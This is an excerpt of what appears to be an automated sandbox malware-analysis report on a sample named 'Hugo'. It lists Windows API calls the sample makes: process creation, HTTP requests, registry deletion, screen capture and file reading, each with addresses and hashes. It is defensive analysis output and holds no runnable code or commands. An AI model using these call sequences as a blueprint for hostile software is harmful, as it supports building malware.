                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F9BBF8
                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F9BC10
                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F9BC34
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F9BC60
                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F9BC74
                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F9BC96
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F9BD92
                                                                                                                                                                                                                • Part of subcall function 00F80F4E: GetStdHandle.KERNEL32(000000F6), ref: 00F80F6D
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F9BDAB
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F9BDC6
                                                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F9BE16
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 00F9BE67
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00F9BE99
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00F9BEAA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00F9BEBC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00F9BECE
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00F9BF43
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2178637699-0
                                                                                                                                                                                                              • Opcode ID: 0c41d64fb64fe3c5176735425cd3f41fb26e961eacfa22a5fb8a377603788106
                                                                                                                                                                                                              • Instruction ID: 7a978099c67c35949d557940e6dbb406c7efe4da52df604c1f532caa2cf11385
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c41d64fb64fe3c5176735425cd3f41fb26e961eacfa22a5fb8a377603788106
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AF1E131A043009FDB14EF24DD91B6ABBE5BF85320F14855DF8898B2A2CB35EC45EB52
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00FADCD0), ref: 00F94B18
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F94B2A
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00FADCD0), ref: 00F94B4F
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00FADCD0), ref: 00F94B9B
                                                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000028,?,00FADCD0), ref: 00F94C05
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000009), ref: 00F94CBF
                                                                                                                                                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F94D25
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00F94D4F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                              • API String ID: 354098117-199464113
                                                                                                                                                                                                              • Opcode ID: f28e1280214a80ef9ebdb4cfbaf61c61c54512d6e843af9b92b3c0841b3db1a8
                                                                                                                                                                                                              • Instruction ID: 287e6ab32f7e47fa984d3c9a4dd5f37ee5cf3c418ded8f7560171053995c5e38
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f28e1280214a80ef9ebdb4cfbaf61c61c54512d6e843af9b92b3c0841b3db1a8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53122A75A00109EFEF14DF54C888EAAB7B5FF95318F148098E90AAB251D731FD46DBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetMenuItemCount.USER32(00FE29C0), ref: 00F53F72
                                                                                                                                                                                                              • GetMenuItemCount.USER32(00FE29C0), ref: 00F54022
                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00F54066
                                                                                                                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 00F5406F
                                                                                                                                                                                                              • TrackPopupMenuEx.USER32(00FE29C0,00000000,?,00000000,00000000,00000000), ref: 00F54082
                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F5408E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 36266755-4108050209
                                                                                                                                                                                                              • Opcode ID: 9c0afb400c61db1bb3fdc5a8efc323077e3a68cb0514a21b428e742e321184e6
                                                                                                                                                                                                              • Instruction ID: c3343b4bd5e2c57521397e83995a2d3759d9a96603f1d16608d2a46180ea669d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c0afb400c61db1bb3fdc5a8efc323077e3a68cb0514a21b428e742e321184e6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98711571A44205FFEB258F28DC89FAABFA4FF05374F140206FA15A61D0C7B1A954EB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DestroyWindow.USER32(00000000,?), ref: 00FA7823
                                                                                                                                                                                                                • Part of subcall function 00F18577: _wcslen.LIBCMT ref: 00F1858A
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00FA7897
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00FA78B9
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FA78CC
                                                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00FA78ED
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F10000,00000000), ref: 00FA791C
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FA7935
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00FA794E
                                                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00FA7955
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FA796D
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00FA7985
                                                                                                                                                                                                                • Part of subcall function 00F12234: GetWindowLongW.USER32(?,000000EB), ref: 00F12242
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                              • String ID: 0$tooltips_class32
                                                                                                                                                                                                              • API String ID: 2429346358-3619404913
                                                                                                                                                                                                              • Opcode ID: da10d4a7b395b977133d8f4b5fc621564a9a7cbad18fd07e2864fefeedecfaa2
                                                                                                                                                                                                              • Instruction ID: 89e7980ee1046d501175225fae50bb903720fd8fc1a21e00e2edf4ae7c950fcd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: da10d4a7b395b977133d8f4b5fc621564a9a7cbad18fd07e2864fefeedecfaa2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B7189B1508344AFD725DF18CC48FAABBE9FB8A310F14045EF98587261DB74E906EB11
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F124B0
                                                                                                                                                                                                              • DragQueryPoint.SHELL32(?,?), ref: 00FA9BA3
                                                                                                                                                                                                                • Part of subcall function 00FA80AE: ClientToScreen.USER32(?,?), ref: 00FA80D4
                                                                                                                                                                                                                • Part of subcall function 00FA80AE: GetWindowRect.USER32(?,?), ref: 00FA814A
                                                                                                                                                                                                                • Part of subcall function 00FA80AE: PtInRect.USER32(?,?,?), ref: 00FA815A
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00FA9C0C
                                                                                                                                                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00FA9C17
                                                                                                                                                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00FA9C3A
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00FA9C81
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00FA9C9A
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00FA9CB1
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00FA9CD3
                                                                                                                                                                                                              • DragFinish.SHELL32(?), ref: 00FA9CDA
                                                                                                                                                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00FA9DCD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                              • API String ID: 221274066-3440237614
                                                                                                                                                                                                              • Opcode ID: 4c409e3f65117213bedb403e12a0561c116cbd0c6cdcf949b7f4b1539785c1e4
                                                                                                                                                                                                              • Instruction ID: 45e85d2f3165f63802e6b4040d27e74318448c5c44efb0836024b933a340481d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c409e3f65117213bedb403e12a0561c116cbd0c6cdcf949b7f4b1539785c1e4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B617BB1108305AFC705EF60DC85D9FBBE8EF89750F40092EF592921A1DB749A49EB52
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F8CEF5
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00F8CF08
                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00F8CF1C
                                                                                                                                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F8CF35
                                                                                                                                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00F8CF78
                                                                                                                                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F8CF8E
                                                                                                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F8CF99
                                                                                                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F8CFC9
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00F8D021
                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00F8D035
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00F8D040
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3800310941-3916222277
                                                                                                                                                                                                              • Opcode ID: 9acdcb9df4f12fd3a2d226871f97fe49f2bcc41a6f73120ab34824ec730a8ec1
                                                                                                                                                                                                              • Instruction ID: dd2f534325cf5c26f649c23236c3fa7d7e08d682714a87f53d3b50abdac4063a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9acdcb9df4f12fd3a2d226871f97fe49f2bcc41a6f73120ab34824ec730a8ec1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E513AB1900608BFEB25AF61CC88AEB7BBCFF49794F00441AF94696650D734D945BBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00FA66D6,?,?), ref: 00FA8FEE
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00FA66D6,?,?,00000000,?), ref: 00FA8FFE
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00FA66D6,?,?,00000000,?), ref: 00FA9009
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00FA66D6,?,?,00000000,?), ref: 00FA9016
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00FA9024
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00FA66D6,?,?,00000000,?), ref: 00FA9033
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00FA903C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00FA66D6,?,?,00000000,?), ref: 00FA9043
                                                                                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00FA66D6,?,?,00000000,?), ref: 00FA9054
                                                                                                                                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00FB0C04,?), ref: 00FA906D
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00FA907D
                                                                                                                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00FA909D
                                                                                                                                                                                                              • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00FA90CD
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00FA90F5
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00FA910B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3840717409-0
                                                                                                                                                                                                              • Opcode ID: c20b7462dabf7f19e3a6d503350c95230bb7f9ba14824139b5a8e95b540c2edf
                                                                                                                                                                                                              • Instruction ID: 642da10b0f28fccfff1fe49bf4a4aca95866e1e3ad431254a35f3c7bceadf1c4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c20b7462dabf7f19e3a6d503350c95230bb7f9ba14824139b5a8e95b540c2edf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC410EB5600208BFDB119F65DC48EAB7BB9FF8A751F108069F906D7260DB709D41EB20
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333
                                                                                                                                                                                                                • Part of subcall function 00F9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F9C10E,?,?), ref: 00F9D415
                                                                                                                                                                                                                • Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D451
                                                                                                                                                                                                                • Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D4C8
                                                                                                                                                                                                                • Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D4FE
                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F9C154
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F9C1D2
                                                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(?,?), ref: 00F9C26A
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00F9C2DE
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00F9C2FC
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00F9C352
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F9C364
                                                                                                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F9C382
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00F9C3E3
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00F9C3F4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                              • API String ID: 146587525-4033151799
                                                                                                                                                                                                              • Opcode ID: d83d9451f628cb6517c42b03ce7e6011cb4d2d0884755b7f69e772ec9e4640e1
                                                                                                                                                                                                              • Instruction ID: e944c15e2bd657282e27bcf0bc24daac867c783600604e8d2e4616d08dbd3109
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d83d9451f628cb6517c42b03ce7e6011cb4d2d0884755b7f69e772ec9e4640e1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54C19E35604201EFEB10DF54C895F6ABBE1BF84318F14849CF4568B2A2CB35ED86EB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00F93035
                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00F93045
                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 00F93051
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00F9305E
                                                                                                                                                                                                              • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00F930CA
                                                                                                                                                                                                              • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00F93109
                                                                                                                                                                                                              • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00F9312D
                                                                                                                                                                                                              • SelectObject.GDI32(?,?), ref: 00F93135
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00F9313E
                                                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 00F93145
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 00F93150
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                              • String ID: (
                                                                                                                                                                                                              • API String ID: 2598888154-3887548279
                                                                                                                                                                                                              • Opcode ID: 74bdede3ac105b54e0145f1909decc873d566c4dc44dc0c3a253870db3a3539f
                                                                                                                                                                                                              • Instruction ID: dcf98a4a23ddd67685ca27a478579a3ff27902694debfb23bf9439e540fc2f8c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74bdede3ac105b54e0145f1909decc873d566c4dc44dc0c3a253870db3a3539f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5061D2B6D00219AFDF04CFA4DC84EAEBBB5FF48310F208529E556A7250D775AA41DFA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F124B0
                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00FAA990
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000011), ref: 00FAA9A7
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00FAA9B3
                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00FAA9C9
                                                                                                                                                                                                              • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00FAAC15
                                                                                                                                                                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00FAAC33
                                                                                                                                                                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00FAAC54
                                                                                                                                                                                                              • ShowWindow.USER32(00000003,00000000), ref: 00FAAC73
                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00FAAC95
                                                                                                                                                                                                              • DefDlgProcW.USER32(?,00000005,?), ref: 00FAACBB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
